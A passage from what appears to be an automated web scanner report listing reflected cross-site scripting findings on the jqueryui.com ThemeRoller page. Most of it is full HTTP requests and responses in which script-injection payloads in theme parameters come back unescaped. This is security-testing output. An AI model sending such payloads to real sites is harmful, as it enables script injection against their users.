GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222ae8b9"><script>alert(1)</script>aee3e277a5&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
der=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222ae8b9"><script>alert(1)</script>aee3e277a5&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpac
...[SNIP]...

4.169. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c16"><script>alert(1)</script>7fb96a46603 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c0882c16"><script>alert(1)</script>7fb96a46603&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c0882c16"><script>alert(1)</script>7fb96a46603&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=
...[SNIP]...

4.170. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c249f"><script>alert(1)</script>98f0b51fcf6 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27ac249f"><script>alert(1)</script>98f0b51fcf6&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Highlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27ac249f"><script>alert(1)</script>98f0b51fcf6&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thickness
...[SNIP]...

4.171. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5287f"><script>alert(1)</script>c5daa8ea141 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff5287f"><script>alert(1)</script>c5daa8ea141&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff5287f"><script>alert(1)</script>c5daa8ea141&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.
...[SNIP]...

4.172. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1269"><script>alert(1)</script>55ed6b8ddc4 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1d1269"><script>alert(1)</script>55ed6b8ddc4&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1d1269"><script>alert(1)</script>55ed6b8ddc4&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pn
...[SNIP]...

4.173. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb51"><script>alert(1)</script>0aa0fcacc1c was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png
...[SNIP]...

4.174. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a79"><script>alert(1)</script>e2b9c487bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?a2a79"><script>alert(1)</script>e2b9c487bc1=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:56:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&a2a79"><script>alert(1)</script>e2b9c487bc1=1" type="text/css" media="all" />
...[SNIP]...

4.175. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f207"><script>alert(1)</script>b6937b6baad was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px8f207"><script>alert(1)</script>b6937b6baad&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px8f207"><script>alert(1)</script>b6937b6baad&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.176. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c51e"><script>alert(1)</script>866f1ad0c97 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px8c51e"><script>alert(1)</script>866f1ad0c97&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px8c51e"><script>alert(1)</script>866f1ad0c97&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.177. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a567e"><script>alert(1)</script>8e28c85fa0f was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50a567e"><script>alert(1)</script>8e28c85fa0f&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50a567e"><script>alert(1)</script>8e28c85fa0f&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="al
